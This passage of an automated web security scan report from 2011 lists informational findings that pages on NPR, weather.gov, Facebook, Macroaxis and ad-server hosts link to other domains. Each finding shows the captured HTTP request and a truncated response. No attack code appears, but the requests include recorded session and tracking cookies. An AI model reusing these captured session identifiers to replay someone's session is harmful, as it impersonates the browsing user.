Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQKEgjxlQEQChgCIAIoAjC055_uBBC055_uBBgC; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#0c)_VsdNmQotNi@m4]2M2UNvB^a*m(qsP<$5Y8+$btG4Ak815t9uZT9Y!Tss2(U=u08T#U*@.xf`p:/Y=@C'V`%3VDqSpO@2LNZ!a`mkrE=4S%OOWjxx?I%f.`8P<Q_=:K!N$S@p'W+mpx*RcdvEi=A'#X@PH+HTK.^[b/a`!b`#0B@$kf.F^2QqXMVbeza'$l/3mV)X=JbA6Dg2elt<r$Y2-LH'3+IRb[FhsHCNft/g2g4RKbYm([]%2pZmoc2O!J^AMCh5bcwNx(n]g=GtY31<eFv=Py[$vPQoKQvElD]jJ?WfA/mkYXJ7^YX%RfRfRP:B4Z:9)LOWaVQ._BYWVIt9SF3qfRr>MH2W4cYAiW:f92EX!%l#-=WZMff'fhbMApWS<YV1Fhq@f^5^1!7tcd#9Tdp::!P@XBy<13HmsxW[=X*.JJZAZnXKfBb0ZkTQDm.8h6r:GEYo'apKW77#x>UomXwbCI8b[s00xdd5UEfSDB=f<o'@gNUP)v6ITb?O-]le_)Ef0+aq9aCbvK/[`(!X92Jj!xp88_699MG!SR'2XPaU>9U<.1_BU7EhhEGpC$Dl]#Jj1o$JVk<kds/pZAV[23<*Wg2v^crt$`<vw8HjZ)4K>b:4bVPY

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:37:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:37:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:37:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIhboCEAoYASABKAEwnZSg7gQQnZSg7gQYAA..; path=/; expires=Sun, 07-Aug-2011 15:37:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb933293=5_[r^kI/7Zw[-!!0nf8MAYR8I?enc=rkfhehSu4z-DwMqhRbbhPwAAAKCZmfk_g8DKoUW24T-uR-F6FK7jPzF8xuA56TROSsYda6b2ziUdCshNAAAAACgjBgA3AQAAGgEAAAIAAACoJgQAar8AAAEAAABVU0QAVVNEANgCWgCqAQAAFBABAgUCAAUAAAAA6yROvQAAAAA.&tt_code=cm.rub_usatoday&udj=uf%28%27a%27%2C+2248%2C+1304955445%29%3Buf%28%27c%27%2C+61473%2C+1304955445%29%3Buf%28%27r%27%2C+272040%2C+1304955445%29%3Bppv%287166%2C+%275635385468540845105%27%2C+1304955445%2C+1336491445%2C+61473%2C+49002%29%3B&cnd=!lxbphQih4AMQqM0QGAAg6v4CKAAxrkfhehSu4z9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABomgI.; path=/; expires=Tue, 10-May-2011 15:37:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:37:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0c)_VtN.!fFc)4A9CkOy>5#Y2:H9+'(s':?6bLT2bujaqZM1q=3$<oxAN2R+-Q=f*ZD9q01F/yR!pPep@lhr?6lR5#u^LepX@-Bq@%t>BCt6LR9nqEku7!%x^cbAH:CBp4SoB_g)flf'+AW^8$vA%+R@BlT0>Og>^(#8Df^Mjo0*A?Rk8fO`zgI/(/6j]*nXBx`1s6=M3kv/VxS`aeS9/q?'v_7C+:@wG$N2=H<:IL#14#$D?40tLzI7=H'2$jLWN7CRm/8$vYZ!X@-8eFH`<@QU6Hj+1jDBpEB`8OjKb'GjgX8RAnuKCH.)XGBs/J*S:!cS[S?s$.iZwpczluvIHD7:hcBh=OMr6>JCzU3a>.GYzcjXc/wl$jxr6gM]N:Juk`F$fOJ>VqTH878oNWsnzJf=VOiSkZWN62OH1jwf[jvq%+U<RPfFF?JO'GuCZTEo.S'$TmrW>o(Q%@XomCXfdO.cX7MxB^OTpJ)U_<-[pmSCx0$Tnvy]D=wvcAfmROfiaS6^vmJJpx.1]4YgsAD[$hbMf827(omrkIHMu4m(=%V4yO-<vwSX0@uimPr?_!$6mB1.>xJj+Km$psS8m[pFyvxb1!cI4mu./=I>2v+AHbIE.bvpEgK*U.!FLR(G7Qv#Y*; path=/; expires=Sun, 07-Aug-2011 15:37:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 09 May 2011 15:37:01 GMT
Content-Length: 701

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rub_usatoday/;net=cm;u=,cm-65201734_1304955420,11f8f328940989e,weath,ax.40-am.h-am.b-cm.ent_h-cm.music_h-ti.aal-b
...[SNIP]...
</scr'+'ipt>');document.write('<img src="http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTc4JnRsPTE1NzY4MDA=&piggybackCookie=uid:2724386019227846218" width="1" height="1"/>');

17.26. http://login.npr.org/openid/embed

Summary

Severity:   Information
Confidence:   Certain
Host:   http://login.npr.org
Path:   /openid/embed

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /openid/embed?token_url=http%3A%2F%2Fwww.npr.org%2Ftemplates%2Freg%2Flogin-janrain-submit.php HTTP/1.1
Host: login.npr.org
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; s_cc=true; s_sq=nprorg%3D%2526pid%253D136128917-Mississippi%252520River%252520Could%252520Crest%252520Monday%252520At%252520Memphis%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.npr.org/%25253Futm_source%25253Dtopnav%252526utm_medium%25253Dtopnav%252526utm_campaign%25253Dtopnav%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:39:49 GMT
Content-Type: text/html
Last-Modified: Thu, 05 May 2011 02:07:43 GMT
Connection: keep-alive
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 4792

<!DOCTYPE html>
<html dir="ltr" >
<head>
<title>Sign in - Powered by Janrain</title>
<meta charset="UTF-8" />

<script src="https://s3.amazonaws.com/static.rpxnow.com/js/lib/rpx.js" type="text/javascript"></script>
<link href="http://cdn.rpxnow.com/rel/css/43f1456414c372352b92e25b50c05ac5.css" media="screen" rel="stylesheet" type="text/css" />

<style type="text/css">
...[SNIP]...
</div>
<img class="loading" id="loading"
style="visibility: hidden;"
src="http://cdn.rpxnow.com/rel/img/9a8269421303631316be4ab5e34870e1.gif"/>

</div>
...[SNIP]...
</script>

<script src="http://cdn.rpxnow.com/rel/js/28a35f3454bf56715fe8f8b20c5b1fff.js" type="text/javascript"></script>
...[SNIP]...

17.27. http://radar.weather.gov/radar.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /radar.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /radar.php?rid=hdx&product=N0R&overlay=11101111&loop=no HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Referer: http://radar.weather.gov/Conus/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=31
Expires: Mon, 09 May 2011 15:38:29 GMT
Date: Mon, 09 May 2011 15:37:58 GMT
Connection: close
Content-Length: 25348

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head>
<title>NWS radar image from Holloman Air Force Base, NM</title>
<meta name=
...[SNIP]...
<div id="noaalink"><a href="http://www.noaa.gov"><img src="graphics/noaalink.gif" alt="Go to the NOAA Homepage" width="80" height="80" border="0">
...[SNIP]...
<div id="nwslink"><a href="http://www.nws.noaa.gov"><img src="graphics/noaalink.gif" alt="Go to the NWS Homepage" width="80" height="80" border="0">
...[SNIP]...
</strong> <a href="http://www.srh.noaa.gov/jetstream/doppler/ridge.htm#range">How does this work?</a>
...[SNIP]...
<td class="footertd1"><a href="http://www.USA.gov/"><img src="graphics/usagov_logo.gif" title="USA.gov is the U.S. government's official web portal" alt="USA.gov is the U.S. government's official web portal" width="110" height="30" border="0">
...[SNIP]...
<br>
&nbsp;&nbsp;<a href="http://www.srh.noaa.gov/jetstream/doppler/radarfaq.htm" class="navbar" title="Frequently Asked Questions">Radar FAQ</a><br>
&nbsp;&nbsp;<a href="http://www.srh.noaa.gov/jetstream/doppler/ridge_download.htm" class="navbar" title="Downloading Images">Downloading Images</a><br>
&nbsp;&nbsp;<a href="http://www.srh.noaa.gov/cte.htm" class="navbar" title="Mobile Weather">Mobile Users</a>
...[SNIP]...
<br />
&nbsp;&nbsp;<a href="http://www.srh.noaa.gov/jetstream/doppler/doppler_intro.htm" class="navbar" title="Learn about the operation of dopper radar">Doppler University</a><br>
&nbsp;&nbsp;<a href="http://www.nws.noaa.gov/credits.php#plugins" class="navbar">Color Blindness Tool</a>
...[SNIP]...

17.28. http://shop.npr.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.npr.org
Path:   /

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /?utm_source=topnav&utm_medium=topnav&utm_campaign=topnav HTTP/1.1
Host: shop.npr.org
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/story/story.php?storyId=136128917
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; s_cc=true; s_sq=nprorg%3D%2526pid%253D136128917-Mississippi%252520River%252520Could%252520Crest%252520Monday%252520At%252520Memphis%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.npr.org/%25253Futm_source%25253Dtopnav%252526utm_medium%25253Dtopnav%252526utm_campaign%25253Dtopnav%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:49 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: ShoppingCartSession=3asomka8201jdf038aopdaio11; expires=Tue, 10-May-2011 01:39:49 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 25071

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<img src="http://ems.alm75.com/images/ssl.gif" height="95" width="189" /> -->
<script type="text/javascript" src="https://seal.thawte.com/getthawteseal?host_name=shop.npr.org&amp;size=M&amp;lang=en"></script>
<br />
<a style="color:#AD0034" target="_blank" href="http://www.thawte.com/digital-certificates/">ABOUT SSL CERTIFICATES</a>
...[SNIP]...

17.29. http://widgets.macroaxis.com/widgets/partnerMarketsIntradaySnap.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.macroaxis.com
Path:   /widgets/partnerMarketsIntradaySnap.jsp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /widgets/partnerMarketsIntradaySnap.jsp?gia=t&t=26&s=NYA,IXIC,GSPC HTTP/1.1
Host: widgets.macroaxis.com
Proxy-Connection: keep-alive
Referer: http://www.hnedata.net/features/tr_stock_charts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1EE0F56D53B8C87B4B0244807F4A5FA6

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:48 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.28
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 8641

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 strict//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<HTML>
<HEAD>
   

<link href="http://cdn.macroaxis.netdna-cdn.com/skins/minimum.css" rel="stylesheet" type="text/css">
<script type="text/javascript" src="http://cdn.macroaxis.netdna-cdn.com/scripts/minimum.js"></script>
...[SNIP]...
<a href='http://www.macroaxis.com/invest/menu/mainInfo/blogGadgetsTour' target="_blank" title='Macroaxis: Get Financial Widgets' >
           <img src='http://cdn.macroaxis.netdna-cdn.com/images/macroaxisPartnerLogo2.png' alt='Macroaxis: Get Financial Widgets'/></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/invc.macroaxis/widget;kw=;kval=widget;tile=11;sz=88x31;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/invc.macroaxis/widget;kw=;kval=widget;tile=11;sz=88x31;ord=123456789?" width="88" height="31" border="0" alt=""></a>
...[SNIP]...
<a href="http://www.macroaxis.com/?pitch=widgetClose" align="right" target="_blank" onclick="javascript:closeAds('xx');" valign='top'>
               <img align='left' src='http://cdn.macroaxis.netdna-cdn.com/images/buttons/closeWidget.png' onmouseout="src='http://cdn.macroaxis.netdna-cdn.com/images/buttons/closeWidget.png'" onmouseover="src='http://cdn.macroaxis.netdna-cdn.com/images/buttons/closeWidget_s.png'" title='Hide these Ads for today'>
           </a>
...[SNIP]...
<div>&nbsp;<img onError="this.parentNode.innerHTML='';" aling="absbottom" src="http://www.google.com/finance/chart?q=^NYA&cht=s" /></div>
...[SNIP]...
<strong>USA&nbsp;&nbsp;<img src="http://cdn.macroaxis.netdna-cdn.com/images/flags/us.gif" alt="NYA: US" /></strong>
...[SNIP]...
<span class="symbolChangeUp" style="font-size:1em; text-align:right; align:right;">0.09 % <img src="http://cdn.macroaxis.netdna-cdn.com/images/arrows/bigChangeUp.gif" alt="Macroaxis: 0.09 Moved Up" /></span>
...[SNIP]...
<div>&nbsp;<img onError="this.parentNode.innerHTML='';" aling="absbottom" src="http://www.google.com/finance/chart?q=^IXIC&cht=s" /></div>
...[SNIP]...
<strong>USA&nbsp;&nbsp;<img src="http://cdn.macroaxis.netdna-cdn.com/images/flags/us.gif" alt="IXIC: US" /></strong>
...[SNIP]...
<span class="symbolChangeUp" style="font-size:1em; text-align:right; align:right;">0.19 % <img src="http://cdn.macroaxis.netdna-cdn.com/images/arrows/bigChangeUp.gif" alt="Macroaxis: 0.19 Moved Up" /></span>
...[SNIP]...
<div>&nbsp;<img onError="this.parentNode.innerHTML='';" aling="absbottom" src="http://www.google.com/finance/chart?q=^GSPC&cht=s" /></div>
...[SNIP]...
<strong>USA&nbsp;&nbsp;<img src="http://cdn.macroaxis.netdna-cdn.com/images/flags/us.gif" alt="GSPC: US" /></strong>
...[SNIP]...
<span class="symbolChangeUp" style="font-size:1em; text-align:right; align:right;">0.10 % <img src="http://cdn.macroaxis.netdna-cdn.com/images/arrows/bigChangeUp.gif" alt="Macroaxis: 0.1 Moved Up" /></span>
...[SNIP]...
<a title="Embed or share charts from financial widgets gallery" target="_blank" href="http://www.macroaxis.com/invest/widget">
       <img align="absbottom" onMouseOut="src='http://cdn.macroaxis.netdna-cdn.com/images/embed.png'" onMouseOver="src='http://cdn.macroaxis.netdna-cdn.com/images/embed_s.png'" src="http://cdn.macroaxis.netdna-cdn.com/images/embed.png" alt="Embed Financial Widgets"/></a>
...[SNIP]...

17.30. http://wvue.web.entriq.net/nw/dpm/loadplayer/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wvue.web.entriq.net
Path:   /nw/dpm/loadplayer/

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /nw/dpm/loadplayer/?instanceGUID=5ED1F7E8-1A85-BA06-44C9-9FD864CC049C&affiliateGUID=&mt=1&playerID=DayPortPlayerCallBack.DayPortPlayer_0&domain=wvue.web.entriq.net&v=2011491537 HTTP/1.1
Host: wvue.web.entriq.net
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:15 GMT
Server: Apache
X-Host: w4
Vary: Accept-Encoding
Cache-Control: max-age=60
Expires: Mon, 09 May 2011 15:38:15 GMT
Content-Type: text/html
Content-Length: 59938

/*
   Player TYPE 2
   DayPort, Inc.
*/
DayPortPlayerCallBack.DayPortPlayer_0.embed = function()
{
   this.version = "201001251308";
   
   this.imageDomain = "wvue.img.entriq.net";
   this.domain = "wvue.web.en
...[SNIP]...
dth == "") || (width == null) || (typeof width == "undefined"))
width = "320";

if ((height == "") || (height == null) || (typeof height == "undefined"))
height = "240";


var tmpObjStr = '<object id="' + id + '" width="' + width + '" height="' + height + '"' +
' classid="clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6"' +
//' codebase="http://activex.microsoft.com/activex/controls/mplayer/en/nsmp2inf.cab#Version=6,4,5,715"' +
' align="baseline" border="0"' +
' standby="Loading Microsoft Windows Media Player components..."' +
' type="application/x-oleobject">
';

//set blank WMV file to simulate stop for non IE browsers
if (emulateStop == true)
{
tmpObjStr += '<param name="URL" value="">
...[SNIP]...

17.31. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /plugins/like.php?href=facebook.com/ChristianScienceMonitor&layout=button_count&show_faces=true&width=110&action=like&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.60.34
X-Cnection: close
Date: Mon, 09 May 2011 15:35:06 GMT
Content-Length: 6900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</script>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/7NS4A3NTFw2.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.32. http://www.facebook.com/plugins/recommendations.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /plugins/recommendations.php?site=www.csmonitor.com&width=270&height=590&header=false&colorscheme=light&font=arial&border_color=%23fff HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.25.50
X-Cnection: close
Date: Mon, 09 May 2011 15:35:07 GMT
Content-Length: 19190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_6b52e61bddc969e3"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.csmonitor.com/Innovation/Horizons/2011/0503/How-Osama-bin-Laden-s-death-sparked-a-fake-Martin-Luther-King-quote" title="How Osama bin Laden&#039;s death sparked a fake Martin Luther King quote" target="_top"><img class="img" src="http://www.csmonitor.com/var/ezflow_site/storage/images/media/images/0503-martin-luther-king-quotes/10049983-1-eng-US/0503-martin-luther-king-quotes_thumbnail_90.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.csmonitor.com/Innovation/Horizons/2011/0503/How-Osama-bin-Laden-s-death-sparked-a-fake-Martin-Luther-King-quote" target="_top">How Osama bin Laden&#039;s death sparked a fake Martin Luther King quote</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_776119d85571861e"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.csmonitor.com/USA/Society/2011/0505/Cinco-de-Mayo-Six-fun-facts-about-the-Fifth-of-May" title="Cinco de Mayo: Six fun facts about the Fifth of May" target="_top"><img class="img" src="http://www.csmonitor.com/var/ezflow_site/storage/images/media/images/0505-us-acincodemayo/10057846-1-eng-US/0505-us-acincodemayo_thumbnail_90.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.csmonitor.com/USA/Society/2011/0505/Cinco-de-Mayo-Six-fun-facts-about-the-Fifth-of-May" target="_top">Cinco de Mayo: Six fun facts about the Fifth of May</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_65f8ac1f0ff5047c"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.csmonitor.com/Innovation/Horizons/2011/0503/PlayStation-Network-back-online-Almost" title="PlayStation Network back online? Almost." target="_top"><img class="img" src="http://www.csmonitor.com/var/ezflow_site/storage/images/media/images/specials/future-focus/ff-innovation-facebook-thumb-100x100/10037027-1-eng-US/ff-innovation-facebook-thumb-100x100_thumbnail_90.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.csmonitor.com/Innovation/Horizons/2011/0503/PlayStation-Network-back-online-Almost" target="_top">PlayStation Network back online? Almost.</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_1ec54e24d9e4a3c4"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.csmonitor.com/USA/Society/2011/0505/National-Day-of-Prayer-a-testament-to-America-s-uniqueness-backers-say" title="National Day of Prayer a testament to America&#039;s uniqueness, backers say" target="_top"><img class="img" src="http://www.csmonitor.com/var/ezflow_site/storage/images/media/images/0505-national-day-prayer.jpg/10057686-1-eng-US/0505-National-Day-Prayer.JPG_thumbnail_90.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.csmonitor.com/USA/Society/2011/0505/National-Day-of-Prayer-a-testament-to-America-s-uniqueness-backers-say" target="_top">National Day of Prayer a testament to America&#039;s uniqueness, backers say</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_7df80b6464f3bc5e"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.csmonitor.com/USA/Military/2011/0505/Military-interrogators-Waterboarding-didn-t-yield-tips-that-led-to-bin-Laden" title="Military interrogators: Waterboarding didn&#039;t yield tips that led to bin Laden" target="_top"><img class="img" src="http://www.csmonitor.com/var/ezflow_site/storage/images/media/images/0505-aenhanced-military-interrogators-waterboarding/10062083-1-eng-US/0505-AENHANCED-Military-interrogators-Waterboarding_thumbnail_90.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.csmonitor.com/USA/Military/2011/0505/Military-interrogators-Waterboarding-didn-t-yield-tips-that-led-to-bin-Laden" target="_top">Military interrogators: Waterboarding didn&#039;t yield tips that led to bin Laden</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_294fe04eb7280e24"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.csmonitor.com/USA/Education/2011/0504/A-third-of-high-school-seniors-lack-basic-grasp-of-civics-US-government" title="A third of high school seniors lack basic grasp of civics, US government" target="_top"><img class="img" src="http://www.csmonitor.com/var/ezflow_site/storage/images/media/images/0504-anaepcivics-high-school-seniors-civics-class/10054953-1-eng-US/0504-ANAEPCIVICS-high-school-seniors-civics-class_thumbnail_90.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.csmonitor.com/USA/Education/2011/0504/A-third-of-high-school-seniors-lack-basic-grasp-of-civics-US-government" target="_top">A third of high school seniors lack basic grasp of civics, US government</a>
...[SNIP]...
